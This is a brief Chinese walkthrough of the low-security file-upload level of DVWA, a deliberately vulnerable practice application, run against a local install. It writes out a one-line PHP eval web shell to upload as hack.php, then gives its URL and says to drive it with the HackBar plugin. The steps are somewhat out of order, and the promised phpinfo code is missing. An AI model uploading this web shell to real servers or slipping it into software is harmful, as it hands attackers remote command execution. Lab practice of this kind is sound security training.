Low
没有进行任何过滤
首相,上传一个phpinfo.php,其内代码如下:
上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php
然后访问
首先,写好
说明存在上传和执行漏洞
上传一句话木马:
<?php @eval($_POST[“hack”]); ?>保存为hack.php
然后上传
找到文件上传目录
http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php
可以直接用hackbar这个插件,上传命令,爆出信息